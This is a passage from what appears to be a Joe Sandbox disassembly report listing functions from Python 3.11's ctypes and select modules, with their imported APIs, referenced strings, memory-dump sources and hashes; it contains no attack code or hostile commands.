API String ID: 437140070-1985973764
Opcode ID: d9cd41fcd4a9d7115470baacfbcd2da228f5ee59300fb10d52ed7cf167236025
Instruction ID: be60c92e4828f91eb23fa900437e843eaa630fce8b7f6a2c6a2b94abb2d93b54
Opcode Fuzzy Hash: d9cd41fcd4a9d7115470baacfbcd2da228f5ee59300fb10d52ed7cf167236025
Instruction Fuzzy Hash: C6011EA1E09BC6C5EA509F5DD4902792360AF5EBD4F607232C71D13294CE2DE49D8300

Function 00007FF8B9061120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

PyModule_GetState.PYTHON311 ref: 00007FF8B906112D
PyUnicode_InternFromString.PYTHON311 ref: 00007FF8B906113D
PyModule_AddObjectRef.PYTHON311 ref: 00007FF8B906115F

Strings

error, xrefs: 00007FF8B9061152
close, xrefs: 00007FF8B9061133

Memory Dump Source

Source File: 00000007.00000002.2087887642.00007FF8B9061000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8B9060000, based on PE: true

Associated: 00000007.00000002.2087851325.00007FF8B9060000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087957246.00007FF8B9063000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087988693.00007FF8B9065000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2088065900.00007FF8B9066000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9060000_lib.jbxd

Similarity

API ID: Module_$FromInternObjectStateStringUnicode_
String ID: close$error
API String ID: 4029360594-371397155
Opcode ID: d1d56f56bfa3555b9ef12796d8bede51d7c66017a5d4b22be61f28461ee977ed
Instruction ID: 5d9439f6d5e77b5bafbdc60bbeaa842d4e6d5bd3f255d803c13867a4005abb27
Opcode Fuzzy Hash: d1d56f56bfa3555b9ef12796d8bede51d7c66017a5d4b22be61f28461ee977ed
Instruction Fuzzy Hash: 38F0DA31A09A8792EE14CF6DF8550793368BF49BD4B588136DB1D4A7A4DF3CD45AC380

Function 00007FF8B93CD770 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B93CD474: PyType_IsSubtype.PYTHON311(?,?,?,?,00007FF8B93C72F4), ref: 00007FF8B93CD488

PyErr_SetString.PYTHON311 ref: 00007FF8B93CD796
PySys_Audit.PYTHON311 ref: 00007FF8B93CD7B5

Strings

ctypes.addressof, xrefs: 00007FF8B93CD7AE
invalid type, xrefs: 00007FF8B93CD78C
(O), xrefs: 00007FF8B93CD7A7

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: AuditErr_StringSubtypeSys_Type_
String ID: (O)$ctypes.addressof$invalid type
API String ID: 288810468-3457326693
Opcode ID: 1ed79e3af6a29a22ef0b12f793c3d6b77dfb8862b8c0b7dc43e2b4ad75ba5f26
Instruction ID: a39e12bb7c4f0b53ffe3630b6fe1ea08e74ff7590fb4f8800a8a2a24a3264e63
Opcode Fuzzy Hash: 1ed79e3af6a29a22ef0b12f793c3d6b77dfb8862b8c0b7dc43e2b4ad75ba5f26
Instruction Fuzzy Hash: 5AF01251B08E8782EF659F6AE8A10762374EF4DFC8F447431DB2D86161EE2CE599C314

Function 00007FF8B93CD264 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON311 ref: 00007FF8B93CD27E
PySys_Audit.PYTHON311 ref: 00007FF8B93CD29B

Strings

ctypes.PyObj_FromPtr, xrefs: 00007FF8B93CD294
O&:PyObj_FromPtr, xrefs: 00007FF8B93CD270
(O), xrefs: 00007FF8B93CD28D

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Arg_AuditParseSys_Tuple
String ID: (O)$O&:PyObj_FromPtr$ctypes.PyObj_FromPtr
API String ID: 3491098224-1450318991
Opcode ID: 2bb121435f85e257f9b1056af5b6aad70d99910b320661e3d929a3a09f6eb257
Instruction ID: 59d578b6655ffaa33b64c5cde4b6140961149de3eff037821d87b7d1d9391e40
Opcode Fuzzy Hash: 2bb121435f85e257f9b1056af5b6aad70d99910b320661e3d929a3a09f6eb257
Instruction Fuzzy Hash: CEF08221A0CEC792EE158F19E8901AA2374FF49BC8F802032D71E47260DE6CE90AC350

Function 00007FF8B9F6A340 Relevance: 7.6, APIs: 5, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FF8B9F6A3B9
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6A3DB
DName::DName.LIBVCRUNTIME ref: 00007FF8B9F6A3EA
DName::DName.LIBVCRUNTIME ref: 00007FF8B9F6A421
DName::DName.LIBVCRUNTIME ref: 00007FF8B9F6A42C

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
Opcode ID: bce8ca39c1d4cdf7971423a01a1e8e868c385637c9e3d3eec5322708e8c4e6dd
Instruction ID: 213d5edc5773a3dae8d3425f2ae71e17354a6bc72bfe24dcffae2b75dcd85fdd
Opcode Fuzzy Hash: bce8ca39c1d4cdf7971423a01a1e8e868c385637c9e3d3eec5322708e8c4e6dd
Instruction Fuzzy Hash: C5417822A08BD694EB10CF68D8910BC2BA4FB15BE5B65A036DB4D173A5DF3DE415C300

Function 00007FF8B93C3F0C Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

PyDict_SetItem.PYTHON311(?,?,00000001,00007FF8B93C6D32), ref: 00007FF8B93C3FA1
_Py_Dealloc.PYTHON311(?,?,00000001,00007FF8B93C6D32), ref: 00007FF8B93C8B3B

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: DeallocDict_Item
String ID:
API String ID: 1953171116-0
Opcode ID: 3e79e8a0ec8c6a2242c0b13afb3047cb975f84468eaa628f38e07b0f45846962
Instruction ID: 043ee8f7c74c2d72894bec1359ae9fed4de2a3d3fd9e456f7fe78cd5aca70adb
Opcode Fuzzy Hash: 3e79e8a0ec8c6a2242c0b13afb3047cb975f84468eaa628f38e07b0f45846962
Instruction Fuzzy Hash: A4213E71A4EFC682FA658F29AD5413A62B4EF8EFD1B186530EB0E47795DF2CE5448300

Function 00007FF8B9062724 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

__WSAFDIsSet.WS2_32 ref: 00007FF8B906274A
PyList_New.PYTHON311(00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B906276B
__WSAFDIsSet.WS2_32 ref: 00007FF8B9062797
PyList_SetItem.PYTHON311(?,?,00007FF8B906224F), ref: 00007FF8B90627B1
_Py_Dealloc.PYTHON311(?,?,00007FF8B906224F), ref: 00007FF8B90627F3

Memory Dump Source

Source File: 00000007.00000002.2087887642.00007FF8B9061000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8B9060000, based on PE: true

Associated: 00000007.00000002.2087851325.00007FF8B9060000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087957246.00007FF8B9063000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087988693.00007FF8B9065000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2088065900.00007FF8B9066000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9060000_lib.jbxd

Similarity

API ID: List_$DeallocItem
String ID:
API String ID: 1559017468-0
Opcode ID: ca1c250aef14b2cb80a943dd37ef050920af6dc516bc50837cea6f6d33c8ee49
Instruction ID: e497ba0b6abf625a6382507076baa451df04618093b721bc454f1217e3586538
Opcode Fuzzy Hash: ca1c250aef14b2cb80a943dd37ef050920af6dc516bc50837cea6f6d33c8ee49
Instruction Fuzzy Hash: 49213931A18A9286EA10CF2EA5046A973A4FB48BC1F584435CB4E87754DF3DE597C380

Function 00007FF8B93C1DD8 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

_PyDict_ContainsId.PYTHON311 ref: 00007FF8B93C1E1D
PyDict_Update.PYTHON311 ref: 00007FF8B93C1E5B
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C1E7E
_PyDict_GetItemIdWithError.PYTHON311 ref: 00007FF8B93C1EB7
_PyObject_SetAttrId.PYTHON311 ref: 00007FF8B93C1ECF
PyErr_Occurred.PYTHON311 ref: 00007FF8B93C1EF0
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C6FA7

Part of subcall function 00007FF8B93C22B0: _PyObject_MakeTpCall.PYTHON311 ref: 00007FF8B93C2301

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dict_$DeallocObject_$AttrCallContainsErr_ErrorItemMakeOccurredUpdateWith
String ID:
API String ID: 3953964043-0
Opcode ID: 83de81b2cdb9a0b5f02c82c61faec42d8a7f4e94c71193b3e965a821689d7666
Instruction ID: 9ab99c9f79e79b85f6d6a1ba8293690d6aeb9321b160ce5b09ac0eabf90ad31b
Opcode Fuzzy Hash: 83de81b2cdb9a0b5f02c82c61faec42d8a7f4e94c71193b3e965a821689d7666
Instruction Fuzzy Hash: 22211721A09FC381EA649F2DA9501BA23B4EF4DBD4F48A035DB4D467A4DF2CF4998300

Function 00007FF8B93C4C60 Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON311 ref: 00007FF8B93C4CD9
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C4CF2
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C90A4
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C90B0

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc
String ID:
API String ID: 3617616757-0
Opcode ID: abd2609812ce25a27d1ac097890b043a0477b61f164c4d0ec192c4a938d68858
Instruction ID: f952c2ccdee86150bbb36ad0918583c0ad949cc51c387bec927b829de10ddbda
Opcode Fuzzy Hash: abd2609812ce25a27d1ac097890b043a0477b61f164c4d0ec192c4a938d68858
Instruction Fuzzy Hash: CF212176D09F8290FFE48F78981837A23B8EF5AF9AF14A030CB4E491A5CF2D55489310

Function 00007FF8B93CDE38 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

PyDict_GetItemWithError.PYTHON311 ref: 00007FF8B93CDE50
PyObject_CallOneArg.PYTHON311 ref: 00007FF8B93CDE61
PyErr_Occurred.PYTHON311 ref: 00007FF8B93CDE69
PyObject_CallOneArg.PYTHON311 ref: 00007FF8B93CDE8D
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CDE9F

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: CallObject_$DeallocDict_Err_ErrorItemOccurredWith
String ID:
API String ID: 4058657591-0
Opcode ID: 1a35c4ab6dce3baf8b5148636fef7374f6697dae909102b08545470e9d818853
Instruction ID: 11bef63ac123948c6a415d5ef5debae9e33f4f6c02c40284381a1ccfac1d03e4
Opcode Fuzzy Hash: 1a35c4ab6dce3baf8b5148636fef7374f6697dae909102b08545470e9d818853
Instruction Fuzzy Hash: EB012C60B0AB8681EF685F2AA95813A52B5EF5DFC0B09A034EB1E07754DE2CE4448310

Function 00007FF8B93CA8D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93CA91B
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CA999
memcpy.VCRUNTIME140 ref: 00007FF8B93CA9AC

Strings

abstract class, xrefs: 00007FF8B93CA911

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: DeallocErr_Stringmemcpy
String ID: abstract class
API String ID: 4155950771-1623945838
Opcode ID: 39caa09f7d9a9fa5dd63c26db85cad3ebfb1af8ff0279c48b353af220d1a1222
Instruction ID: 694c38d7c5678cb6963ba2ff940016f4e68624c393aac980fefb3f2832cdedcd
Opcode Fuzzy Hash: 39caa09f7d9a9fa5dd63c26db85cad3ebfb1af8ff0279c48b353af220d1a1222
Instruction Fuzzy Hash: 5E217732A09F8582EB948F2AA44012A73B4FB48FD4F1A6131DF4D43758CF38E4648300

Function 00007FF8B93C1904 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

PyObject_IsInstance.PYTHON311 ref: 00007FF8B93C193A
PyErr_SetString.PYTHON311 ref: 00007FF8B93C6B72
PyObject_IsSubclass.PYTHON311 ref: 00007FF8B93C6BB1

Strings

abstract class, xrefs: 00007FF8B93C6B68

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Object_$Err_InstanceStringSubclass
String ID: abstract class
API String ID: 1122563627-1623945838
Opcode ID: 6c7db8fb0eb44c7424908bf4032845ff0e9bfd72eafbca4c076b0be6399d20a6
Instruction ID: 9209d0faec746eb965089c5e3f7dc941be9d251503915757046fa9fea8a402d1
Opcode Fuzzy Hash: 6c7db8fb0eb44c7424908bf4032845ff0e9bfd72eafbca4c076b0be6399d20a6
Instruction Fuzzy Hash: C5213D21A0CF8782FB50AF6EA86007A17B5EF4DFC4F04B531DB0E562A5DE2CE4598340

Function 00007FF8B93C402C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B93C3A00: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8B93C3A4B

PyUnicode_FromStringAndSize.PYTHON311 ref: 00007FF8B93C4090

Strings

:%x, xrefs: 00007FF8B93C8B5D
ctypes object structure too deep, xrefs: 00007FF8B93C8B7B

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: FromSizeStringUnicode___stdio_common_vsprintf
String ID: :%x$ctypes object structure too deep
API String ID: 1484205955-3091822184
Opcode ID: 2459c21495d6783b8173aaa301187f361a2d8e91fe46e9680da2c72f9c63c0db
Instruction ID: bb5ca9dbb24f09c2e8ebd5b8a93886b65ad121cf806e6444faf337b5c77e605b
Opcode Fuzzy Hash: 2459c21495d6783b8173aaa301187f361a2d8e91fe46e9680da2c72f9c63c0db
Instruction Fuzzy Hash: D9213B32618AC691EA70CF19E4502AA63A4FB8DBC0F846131DB8E47665DE3CE259CB00

Function 00007FF8B93CA840 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

PySys_Audit.PYTHON311 ref: 00007FF8B93CA866
PyErr_SetString.PYTHON311 ref: 00007FF8B93CA891

Strings

ctypes.cdata, xrefs: 00007FF8B93CA858
abstract class, xrefs: 00007FF8B93CA887

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: AuditErr_StringSys_
String ID: abstract class$ctypes.cdata
API String ID: 1384585920-3531133667
Opcode ID: 9146581257e5cd249a8ce15bd5017c0ced05df42edf8eab21e35891fecd2194b
Instruction ID: 603db8178f5d94a0445f8642d38a4dc1e0bf94e4852e3b28cbfeb0c23ca335f9
Opcode Fuzzy Hash: 9146581257e5cd249a8ce15bd5017c0ced05df42edf8eab21e35891fecd2194b
Instruction Fuzzy Hash: A7013921B19B8282EB548F6AE89017A7BA4FF8DFC4F49A035DB4D97724DF28D455C300

Function 00007FF8B93C3E98 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

PyBytes_AsString.PYTHON311 ref: 00007FF8B93C3EC5
PyLong_AsUnsignedLongLongMask.PYTHON311 ref: 00007FF8B93C3EEC

Strings

bytes or integer address expected instead of %s instance, xrefs: 00007FF8B93C8AEB

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Long$Bytes_Long_MaskStringUnsigned
String ID: bytes or integer address expected instead of %s instance
API String ID: 3464282214-706233300
Opcode ID: c48ceac9eea2b1fa827f2cbb00a6abdd9340ea2753a13b5f87d6d5264b647cc5
Instruction ID: a9a7d704553ac28fa0f85cf50d261bf633100ac30996dc30f0732efcd7b92cd0
Opcode Fuzzy Hash: c48ceac9eea2b1fa827f2cbb00a6abdd9340ea2753a13b5f87d6d5264b647cc5
Instruction Fuzzy Hash: DB011776A09F8A86EB508F29E8902792375FF5DFD4F50A432CB4E42314CE3CE8998300

Function 00007FF8B93CDD4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

PySys_Audit.PYTHON311 ref: 00007FF8B93CDD59
PyLong_FromLong.PYTHON311 ref: 00007FF8B93CDDA4
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CDDB6

Strings

ctypes.get_errno, xrefs: 00007FF8B93CDD52

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: AuditDeallocFromLongLong_Sys_
String ID: ctypes.get_errno
API String ID: 2276389247-2892954555
Opcode ID: c6ace954750aef6584acdef0dbafe0f2db3ad2dcd629e74672a8309c43f57945
Instruction ID: 798c72707f49cf7f77f05db5d961cbb165ce0b80b440995784af85cd7ee74203
Opcode Fuzzy Hash: c6ace954750aef6584acdef0dbafe0f2db3ad2dcd629e74672a8309c43f57945
Instruction Fuzzy Hash: CBF0A421F1ABC2C1EA549F2AE99417A62B5EF8DBC0F482034EB5E47764DF3CE4848700

Function 00007FF8B93C4F04 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

PyUnicode_AsUTF8.PYTHON311 ref: 00007FF8B93C4F39
PyLong_AsUnsignedLongMask.PYTHON311 ref: 00007FF8B93C91C0
PyErr_SetString.PYTHON311 ref: 00007FF8B93C91F5

Strings

function name must be string, bytes object or integer, xrefs: 00007FF8B93C91EB

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_LongLong_MaskStringUnicode_Unsigned
String ID: function name must be string, bytes object or integer
API String ID: 2115587880-3177123413
Opcode ID: 81ea3209a1b354214586730592f4c670ad1da60d41d4e62eb4eacb33d520f56b
Instruction ID: 7c776ccbe6216f0c552d9a3e1501f1c940246f8a49c5c53ea01b93fc78d1bd98
Opcode Fuzzy Hash: 81ea3209a1b354214586730592f4c670ad1da60d41d4e62eb4eacb33d520f56b
Instruction Fuzzy Hash: B7018122B19F8681FB654F6EE8A967922A5EF4DBC4F05B030C64D87760EE2CA4498700

Function 00007FF8B93CDDCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

PyLong_FromLong.PYTHON311 ref: 00007FF8B93CDDA4
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CDDB6
PySys_Audit.PYTHON311 ref: 00007FF8B93CDDD9

Strings

ctypes.get_last_error, xrefs: 00007FF8B93CDDD2

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: AuditDeallocFromLongLong_Sys_
String ID: ctypes.get_last_error
API String ID: 2276389247-1232113872
Opcode ID: 853979658a44e765c27009c70b8a62aa63505b1bac88553f7faa954c15010c56
Instruction ID: 1256689a39b867c9edb1b1a30c1b3bab7eb54e8f6ae889f19a3d2df1c165aa73
Opcode Fuzzy Hash: 853979658a44e765c27009c70b8a62aa63505b1bac88553f7faa954c15010c56
Instruction Fuzzy Hash: 70F0A921F19BC281EB559F3AE99417962B5EF9DBC0F482034EB1E42754DF3CE1848700

Function 00007FF8B93CDA68 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON311 ref: 00007FF8B93CDA97
PySys_Audit.PYTHON311 ref: 00007FF8B93CDAB9

Part of subcall function 00007FF8B93C2980: memset.VCRUNTIME140 ref: 00007FF8B93C2A27
Part of subcall function 00007FF8B93C2980: PyObject_CallOneArg.PYTHON311 ref: 00007FF8B93C2A7E

Strings

ctypes.call_function, xrefs: 00007FF8B93CDAB2
O&O!, xrefs: 00007FF8B93CDA8C

Memory Dump Source

